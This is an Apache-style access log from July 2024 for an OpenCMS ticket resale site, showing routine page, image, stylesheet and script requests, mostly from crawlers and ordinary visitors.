66.249.79.171 - - [19/Jul/2024:04:35:25 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=ADD1F57C-36B4-39D2-9578-BA2614FAFC35 HTTP/1.1" 200 114074
37.60.249.191 - - [19/Jul/2024:04:35:26 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F2FA4242-01BE-3FE2-3A47-7E833A37D435&sortorder=asc&column=price HTTP/1.1" 404 -
47.128.42.139 - - [19/Jul/2024:04:35:26 +0200] "GET /ticket2/opencms/en/venue/?countryid=A95940B8-9D24-555E-8502-7702CF57B799 HTTP/1.1" 200 100101
114.119.153.211 - - [19/Jul/2024:04:35:27 +0200] "GET /ticket2/opencms/en/buy/?page=1&=6CCB6961-ECB4-18EA-B62D-06E43B7F1D47 HTTP/1.1" 200 4403
47.128.42.139 - - [19/Jul/2024:04:35:28 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.42.139 - - [19/Jul/2024:04:35:28 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
47.128.50.2 - - [19/Jul/2024:04:35:30 +0200] "GET /ticket2/opencms/es/buy/?edid=72150D07-CC34-2767-CCE3-D5CBAEB5F5C9 HTTP/1.1" 200 72706
47.128.50.2 - - [19/Jul/2024:04:35:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.50.2 - - [19/Jul/2024:04:35:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
47.128.113.138 - - [19/Jul/2024:04:35:49 +0200] "GET /ticket2/opencms/es/buy/?catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&npage=2 HTTP/1.1" 200 199511
47.128.113.138 - - [19/Jul/2024:04:35:50 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.51.144 - - [19/Jul/2024:04:35:50 +0200] "GET /ticket2/opencms/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=D08E96E8-A514-9E09-4E22-63713911E0B8 HTTP/1.1" 200 82831
47.128.113.138 - - [19/Jul/2024:04:35:50 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
66.249.79.233 - - [19/Jul/2024:04:35:51 +0200] "GET /ticket2/opencms/no/venue/?venueid=E6D4C5C5-380D-4772-E0D1-58201DC9D2A9 HTTP/1.1" 200 72000
47.128.51.144 - - [19/Jul/2024:04:35:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.51.144 - - [19/Jul/2024:04:35:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
37.60.249.191 - - [19/Jul/2024:04:35:52 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F2FA4242-01BE-3FE2-3A47-7E833A37D435&sortorder=asc&column=row HTTP/1.1" 404 -
47.128.123.10 - - [19/Jul/2024:04:36:14 +0200] "GET /ticket2/opencms/no/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=BDD8C04C-DD99-1C07-B5F3-F2AB98D157E8 HTTP/1.1" 200 82450
47.128.123.10 - - [19/Jul/2024:04:36:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.123.10 - - [19/Jul/2024:04:36:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
185.157.223.150 - - [19/Jul/2024:04:36:18 +0200] "GET /ticket2/tickets_export/outgoing/export.txt HTTP/1.1" 200 48019142
37.60.249.191 - - [19/Jul/2024:04:36:20 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F2FA4242-01BE-3FE2-3A47-7E833A37D435&sortorder=asc&column=section HTTP/1.1" 404 -
66.249.79.172 - - [19/Jul/2024:04:36:27 +0200] "GET /ticket2/opencms/fr/buy?page=1&edid=D96122AD-C3AA-80F5-DDA8-935E03AE952D HTTP/1.1" 200 111829
66.249.79.172 - - [19/Jul/2024:04:36:28 +0200] "GET /ticket2/opencms/dk/buy/?page=1&edid=FEE25E36-04D3-46C8-6D56-05013D91539C HTTP/1.1" 200 85113
47.128.38.120 - - [19/Jul/2024:04:36:39 +0200] "GET /ticket2/opencms/fr/buy/?catid=061607E6-22B7-6FFA-03FD-A4B8B13A943F&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 82223
47.128.38.120 - - [19/Jul/2024:04:36:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.38.120 - - [19/Jul/2024:04:36:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
47.128.22.179 - - [19/Jul/2024:04:36:44 +0200] "GET /ticket2/opencms/fi/buy/?page=1&edid=890CCDBB-BBBF-11B0-1E79-EA111E8EF281 HTTP/1.1" 200 97503
47.128.22.179 - - [19/Jul/2024:04:36:45 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.22.179 - - [19/Jul/2024:04:36:45 +0200] "GET /ticket2/opencms/venue/estadiomestalla.gif HTTP/1.1" 200 27860
47.128.22.179 - - [19/Jul/2024:04:36:45 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/two_man.png HTTP/1.1" 200 3407
47.128.22.179 - - [19/Jul/2024:04:36:45 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/ticket_info_button.png HTTP/1.1" 200 3820
47.128.22.179 - - [19/Jul/2024:04:36:46 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
47.128.22.179 - - [19/Jul/2024:04:36:50 +0200] "GET /ticket2/opencms/fi/ask-form.html HTTP/1.1" 200 3012
69.160.160.61 - - [19/Jul/2024:04:37:03 +0200] "GET /ticket2/opencms/no/ HTTP/1.1" 200 95258
47.128.123.150 - - [19/Jul/2024:04:37:03 +0200] "GET /ticket2/opencms/no/buy/?catid=D414C6A5-7A03-3389-42A8-D7B7FE32BB37&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&page=6 HTTP/1.1" 200 77237
69.160.160.61 - - [19/Jul/2024:04:37:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
69.160.160.61 - - [19/Jul/2024:04:37:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
69.160.160.61 - - [19/Jul/2024:04:37:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery-ui.css HTTP/1.1" 200 33221
69.160.160.61 - - [19/Jul/2024:04:37:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 72814
69.160.160.61 - - [19/Jul/2024:04:37:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery.fancybox.css HTTP/1.1" 200 4939
69.160.160.61 - - [19/Jul/2024:04:37:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery.js HTTP/1.1" 200 93868
69.160.160.61 - - [19/Jul/2024:04:37:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583
69.160.160.61 - - [19/Jul/2024:04:37:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery-ui.js HTTP/1.1" 200 228088
69.160.160.61 - - [19/Jul/2024:04:37:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
69.160.160.61 - - [19/Jul/2024:04:37:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
69.160.160.61 - - [19/Jul/2024:04:37:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338
69.160.160.61 - - [19/Jul/2024:04:37:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.fancybox.pack.js HTTP/1.1" 200 23187
69.160.160.61 - - [19/Jul/2024:04:37:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/stickyfill.min.js HTTP/1.1" 200 5672
47.128.123.150 - - [19/Jul/2024:04:37:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
69.160.160.61 - - [19/Jul/2024:04:37:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
69.160.160.61 - - [19/Jul/2024:04:37:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.placeholder.min.js HTTP/1.1" 200 1737
69.160.160.61 - - [19/Jul/2024:04:37:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/common-ajax.js HTTP/1.1" 200 20175
69.160.160.61 - - [19/Jul/2024:04:37:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
69.160.160.61 - - [19/Jul/2024:04:37:04 +0200] "GET /ticket2/opencms/img/fb.png HTTP/1.1" 200 1269
69.160.160.61 - - [19/Jul/2024:04:37:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
69.160.160.61 - - [19/Jul/2024:04:37:04 +0200] "GET /ticket2/opencms/img/insta.png HTTP/1.1" 200 3967
47.128.123.150 - - [19/Jul/2024:04:37:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
69.160.160.61 - - [19/Jul/2024:04:37:04 +0200] "GET /ticket2/opencms/img/check.png HTTP/1.1" 200 548
69.160.160.61 - - [19/Jul/2024:04:37:04 +0200] "GET /ticket2/opencms/img/mail.png HTTP/1.1" 200 403
69.160.160.61 - - [19/Jul/2024:04:37:04 +0200] "GET /ticket2/opencms/img/chat.png HTTP/1.1" 200 416
69.160.160.61 - - [19/Jul/2024:04:37:04 +0200] "GET /ticket2/opencms/img/arrow.png HTTP/1.1" 200 753
69.160.160.61 - - [19/Jul/2024:04:37:04 +0200] "GET /ticket2/opencms/img/banner-sa.jpeg HTTP/1.1" 200 41270
69.160.160.61 - - [19/Jul/2024:04:37:04 +0200] "GET /ticket2/opencms/img/banner-ll.jpeg HTTP/1.1" 200 41825
69.160.160.61 - - [19/Jul/2024:04:37:04 +0200] "GET /ticket2/opencms/img/banner-pl.jpeg HTTP/1.1" 200 41818
69.160.160.61 - - [19/Jul/2024:04:37:05 +0200] "GET /ticket2/opencms/img/icons/se.png HTTP/1.1" 200 1258
69.160.160.61 - - [19/Jul/2024:04:37:05 +0200] "GET /ticket2/opencms/img/icons/no.png HTTP/1.1" 200 1958
69.160.160.61 - - [19/Jul/2024:04:37:05 +0200] "GET /ticket2/opencms/img/icons/globe-white.png HTTP/1.1" 200 947
69.160.160.61 - - [19/Jul/2024:04:37:05 +0200] "GET /ticket2/opencms/img/icons/nl.png HTTP/1.1" 200 1255
69.160.160.61 - - [19/Jul/2024:04:37:05 +0200] "GET /ticket2/opencms/img/icons/fi.png HTTP/1.1" 200 1785
69.160.160.61 - - [19/Jul/2024:04:37:05 +0200] "GET /ticket2/opencms/img/icons/es.png HTTP/1.1" 200 1005
69.160.160.61 - - [19/Jul/2024:04:37:05 +0200] "GET /ticket2/opencms/img/icons/dk.png HTTP/1.1" 200 1706
69.160.160.61 - - [19/Jul/2024:04:37:05 +0200] "GET /ticket2/opencms/img/icons/fr.png HTTP/1.1" 200 1764
69.160.160.61 - - [19/Jul/2024:04:37:05 +0200] "GET /ticket2/opencms/img/icons/de.png HTTP/1.1" 200 1124
69.160.160.61 - - [19/Jul/2024:04:37:05 +0200] "GET /ticket2/opencms/img/icons/it.png HTTP/1.1" 200 2040
69.160.160.61 - - [19/Jul/2024:04:37:05 +0200] "GET /ticket2/opencms/img/icons/en.png HTTP/1.1" 200 2415
69.160.160.61 - - [19/Jul/2024:04:37:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
114.119.131.42 - - [19/Jul/2024:04:37:17 +0200] "GET /ticket2/opencms/en/venue/?venueid=38BF0C40-6823-C6D1-9FFB-8896B6F987BE HTTP/1.1" 200 70754
37.60.249.191 - - [19/Jul/2024:04:37:18 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F2FE555C-AC27-5AA8-8120-C9C64D18709B HTTP/1.1" 404 -
47.128.56.46 - - [19/Jul/2024:04:37:29 +0200] "GET /ticket2/opencms/en/buy/?edid=39E08466-3157-8796-4667-43E78BDCCF55 HTTP/1.1" 200 70903
47.128.56.46 - - [19/Jul/2024:04:37:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.56.46 - - [19/Jul/2024:04:37:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
47.128.22.2 - - [19/Jul/2024:04:37:36 +0200] "GET /ticket2/opencms/fi/venue/?venueid=D865EDC3-A8C8-8107-EEAE-35A140CA5350 HTTP/1.1" 200 72306
47.128.22.2 - - [19/Jul/2024:04:37:37 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.22.2 - - [19/Jul/2024:04:37:37 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
63.143.42.252 - - [19/Jul/2024:04:37:41 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
63.143.42.252 - - [19/Jul/2024:04:37:44 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
47.128.62.32 - - [19/Jul/2024:04:37:47 +0200] "GET /ticket2/opencms/no/buy/?edid=734C6A51-079B-DC49-D097-AED66CC22C3C HTTP/1.1" 200 72276
47.128.62.32 - - [19/Jul/2024:04:37:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.62.32 - - [19/Jul/2024:04:37:49 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
114.119.159.6 - - [19/Jul/2024:04:37:50 +0200] "GET /ticket2/opencms/en/venue/?venueid=6E74DDFB-B5A5-70DD-F587-B3566A502D6D HTTP/1.1" 200 70709
66.249.76.1 - - [19/Jul/2024:04:37:52 +0200] "GET /ticket2/opencms/no/buy?page=1&edid=B06AF4F4-E0B4-9C7E-FDA1-698E9F88DF19 HTTP/1.1" 200 85903
47.128.121.17 - - [19/Jul/2024:04:37:52 +0200] "GET /ticket2/opencms/no/buy/?catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&eventid=5FF016E6-EE6E-EC4B-33C6-3CE328714E1F&page=6 HTTP/1.1" 200 101311
47.128.121.17 - - [19/Jul/2024:04:37:53 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
66.249.79.233 - - [19/Jul/2024:04:37:53 +0200] "GET /ticket2/opencms/it/buy?page=1&edid=C4A85847-D040-EB89-2141-54F1A8B66277 HTTP/1.1" 200 92344
37.60.249.191 - - [19/Jul/2024:04:37:53 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F390A5E5-D6FF-349F-808E-346867C2ACB9&sortorder=asc&column=price HTTP/1.1" 404 -
47.128.121.17 - - [19/Jul/2024:04:37:53 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
217.182.175.146 - - [19/Jul/2024:04:37:58 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=87963EDF-09A2-A6CA-2338-2C9DD726B815&sortorder=desc&column=row HTTP/1.1" 200 88730
217.182.175.146 - - [19/Jul/2024:04:38:04 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=8E0AECA0-821A-C202-C7FE-13DCCA0FF2EF&sortorder=desc&column=row HTTP/1.1" 200 88550
217.182.175.146 - - [19/Jul/2024:04:38:10 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=91851CE1-DEEA-F6FA-15A7-E92688F40B77&sortorder=desc&column=price HTTP/1.1" 200 89225
217.182.175.146 - - [19/Jul/2024:04:38:15 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=91851CE1-DEEA-F6FA-15A7-E92688F40B77&sortorder=desc&column=section HTTP/1.1" 200 89225
37.60.249.191 - - [19/Jul/2024:04:38:16 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F390A5E5-D6FF-349F-808E-346867C2ACB9&sortorder=asc&column=row HTTP/1.1" 404 -
217.182.175.146 - - [19/Jul/2024:04:38:22 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=91AE26B3-2C40-9494-FDC1-D5A84F5FD6FD HTTP/1.1" 200 88508
115.164.94.135 - - [19/Jul/2024:04:38:25 +0200] "GET /ticket2/opencms/en/buying_tickets/ HTTP/1.1" 200 72532
115.164.94.135 - - [19/Jul/2024:04:38:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
115.164.94.135 - - [19/Jul/2024:04:38:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
115.164.94.135 - - [19/Jul/2024:04:38:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 72814
115.164.94.135 - - [19/Jul/2024:04:38:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583
115.164.94.135 - - [19/Jul/2024:04:38:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
115.164.94.135 - - [19/Jul/2024:04:38:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
115.164.94.135 - - [19/Jul/2024:04:38:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338
115.164.94.135 - - [19/Jul/2024:04:38:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
115.164.94.135 - - [19/Jul/2024:04:38:26 +0200] "GET /ticket2/opencms/img/icons/nl.png HTTP/1.1" 200 1255
115.164.94.135 - - [19/Jul/2024:04:38:26 +0200] "GET /ticket2/opencms/img/icons/de.png HTTP/1.1" 200 1124
115.164.94.135 - - [19/Jul/2024:04:38:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/event-banner.png HTTP/1.1" 404 -
115.164.94.135 - - [19/Jul/2024:04:38:27 +0200] "GET /ticket2/opencms/img/icons/fr.png HTTP/1.1" 200 1764
115.164.94.135 - - [19/Jul/2024:04:38:27 +0200] "GET /ticket2/opencms/img/icons/es.png HTTP/1.1" 200 1005
115.164.94.135 - - [19/Jul/2024:04:38:27 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
115.164.94.135 - - [19/Jul/2024:04:38:27 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
66.249.79.231 - - [19/Jul/2024:04:38:29 +0200] "GET /ticket2/opencms/set_aff_cookie.jsp?partner=2E02071B-A8C3-4CBA-3097-C27D61C02ED8&url=/dk/buy/index.html%3Fpage%3D1%26edid%3D1BDA6D08-38AF-6470-7423-555F9C3DEC73%26hlv%3D66733fa8-92b0-408f-ae64-696b0a01000f%23v_1675219330 HTTP/1.1" 200 226
114.119.134.51 - - [19/Jul/2024:04:38:30 +0200] "GET /ticket2/opencms/en/sell?edid=818BFE3F-AC93-486D-C86E-30E2A3081A30 HTTP/1.1" 302 -
66.249.79.231 - - [19/Jul/2024:04:38:30 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=66EB75EF-0CBD-BA1B-9342-85D051C2996A HTTP/1.1" 200 87410
47.128.98.120 - - [19/Jul/2024:04:38:30 +0200] "GET /ticket2/opencms/fr/?comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 95131
217.182.175.146 - - [19/Jul/2024:04:38:30 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=91B54E6E-0900-756C-0831-B2A406984595&sortorder=desc&column=price HTTP/1.1" 200 85955
47.128.98.120 - - [19/Jul/2024:04:38:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.98.120 - - [19/Jul/2024:04:38:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
114.119.134.51 - - [19/Jul/2024:04:38:33 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 72802
66.249.76.170 - - [19/Jul/2024:04:38:35 +0200] "GET /ticket2/opencms/dk/buy/?page=1&edid=1BDA6D08-38AF-6470-7423-555F9C3DEC73&hlv=66733fa8-92b0-408f-ae64-696b0a01000f HTTP/1.1" 200 117925
217.182.175.146 - - [19/Jul/2024:04:38:39 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=91B54E6E-0900-756C-0831-B2A406984595&sortorder=desc&column=section HTTP/1.1" 200 85955
37.60.249.191 - - [19/Jul/2024:04:38:45 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F390A5E5-D6FF-349F-808E-346867C2ACB9&sortorder=asc&column=section HTTP/1.1" 404 -
66.249.79.233 - - [19/Jul/2024:04:38:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338
37.60.249.191 - - [19/Jul/2024:04:39:00 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F390A5E5-D6FF-349F-808E-346867C2ACB9&sortorder=desc&column=row HTTP/1.1" 404 -
37.60.249.191 - - [19/Jul/2024:04:39:16 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F390A5E5-D6FF-349F-808E-346867C2ACB9&sortorder=desc&column=section HTTP/1.1" 404 -
47.128.126.102 - - [19/Jul/2024:04:39:21 +0200] "GET /ticket2/opencms/nl/buy/?catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&eventid=79608D61-AAF5-D175-02C0-7A0FB72F565C&page=6 HTTP/1.1" 200 98528
47.128.126.102 - - [19/Jul/2024:04:39:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.126.102 - - [19/Jul/2024:04:39:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
37.123.143.245 - - [19/Jul/2024:04:39:28 +0200] "GET /ticket2/opencms/system/workplace/views/top_foot.jsp?wpFrame=foot HTTP/1.1" 200 1211
37.123.143.245 - - [19/Jul/2024:04:39:29 +0200] "GET /ticket2/opencms/system/workplace/commons/style/workplace.css HTTP/1.1" 200 14209
66.249.76.167 - - [19/Jul/2024:04:39:31 +0200] "GET /ticket2/opencms/fi/venue/?venueid=10215421-D49E-AFEB-54BC-61D044D84B88 HTTP/1.1" 200 72277
37.60.249.191 - - [19/Jul/2024:04:39:37 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F4C61204-D1C7-427C-4F65-1F077CA01CD3&sortorder=asc&column=price HTTP/1.1" 404 -
52.167.144.173 - - [19/Jul/2024:04:39:40 +0200] "GET /ticket2/opencms/en/buy?page=1&edid=070182EB-30EF-F34B-AE41-C4B61E82D2C9 HTTP/1.1" 200 99233
66.249.79.173 - - [19/Jul/2024:04:39:55 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=B4ED35E0-F6E1-A7C7-5FDD-67B8072FAF0B HTTP/1.1" 200 88951
37.60.249.191 - - [19/Jul/2024:04:39:59 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F4C61204-D1C7-427C-4F65-1F077CA01CD3&sortorder=asc&column=row HTTP/1.1" 404 -
47.128.39.155 - - [19/Jul/2024:04:40:05 +0200] "GET /ticket2/opencms/dk/buy/?edid=573FB22B-2B7E-CE20-BB1B-B3AE15AF0D11 HTTP/1.1" 200 71437
47.128.39.155 - - [19/Jul/2024:04:40:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.39.155 - - [19/Jul/2024:04:40:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
47.128.45.206 - - [19/Jul/2024:04:40:13 +0200] "GET /ticket2/opencms/fi/venue/?venueid=3DCA1EBE-D9BE-DD1C-EB06-4E924D709E50 HTTP/1.1" 200 72285
47.128.45.206 - - [19/Jul/2024:04:40:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.45.206 - - [19/Jul/2024:04:40:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
37.60.249.191 - - [19/Jul/2024:04:40:31 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F4C61204-D1C7-427C-4F65-1F077CA01CD3&sortorder=desc&column=price HTTP/1.1" 404 -
66.249.79.171 - - [19/Jul/2024:04:40:33 +0200] "GET /ticket2/opencms/fi/venue/?venueid=C7AA5792-84B6-B218-74FE-1EF0121317B1 HTTP/1.1" 200 72286
37.60.249.191 - - [19/Jul/2024:04:40:53 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F4C61204-D1C7-427C-4F65-1F077CA01CD3&sortorder=desc&column=row HTTP/1.1" 404 -
66.249.76.8 - - [19/Jul/2024:04:40:56 +0200] "GET /ticket2/opencms/fi/venue/?venueid=CF91071C-3412-BA8E-033B-F6FD610B69D5 HTTP/1.1" 200 72313
47.128.48.156 - - [19/Jul/2024:04:41:05 +0200] "GET /ticket2/opencms/fi/venue/?countryid=994C90A3-4106-B64A-E9EB-11D9EC699E18 HTTP/1.1" 200 101663
47.128.48.156 - - [19/Jul/2024:04:41:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.48.156 - - [19/Jul/2024:04:41:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
37.60.249.191 - - [19/Jul/2024:04:41:14 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F4C61204-D1C7-427C-4F65-1F077CA01CD3&sortorder=desc&column=section HTTP/1.1" 404 -
37.60.249.191 - - [19/Jul/2024:04:41:49 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=F503AB1D-5285-4EFD-342F-0CC2D9705E49&sortorder=asc&column=price HTTP/1.1" 404 -
